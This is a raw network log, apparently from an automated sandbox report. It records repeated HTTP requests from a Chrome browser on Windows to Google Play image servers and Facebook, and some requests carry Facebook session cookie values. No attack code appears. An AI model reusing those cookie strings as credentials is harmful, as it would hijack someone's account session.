    Source: global trafficHTTP traffic detected: GET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bhwvgLPwlrUGC29L7T2GkUyJe7bPzKxeuRFxEHWG7RCFDP_PtJ5WPtdk6QW-KKMn7Zy2=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/webstorage/process_keys/?state=1 HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=6&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /pages/create/?ref_type=registration_form HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yU/l/0,cross/ODVjh0Ni5D7.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y0/l/0,cross/ziNkdVTlV4m.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yI/l/0,cross/X9tSrDjPzyV.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yo/l/0,cross/b-9VvptAdOY.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yF/l/0,cross/0QTORSxRVO1.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yN/l/0,cross/S60_mKfvulW.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y0/l/0,cross/o2L07-KO0Bj.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y6/l/0,cross/WXyn0RO_iMz.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yx/l/0,cross/e3WW2lRt6d_.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yI/l/0,cross/TZbd1-PK_cx.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yO/l/0,cross/KuH9BoeRDxR.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ij9m4/yu/l/en_GB/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yP/r/ZQxGeuP1tWI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikpZ4/yJ/l/en_GB/GW1DkJBvUCz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iLl54/yM/l/en_GB/uG4EfEPS4Rt.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yY/r/pRN8RJz6VlO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
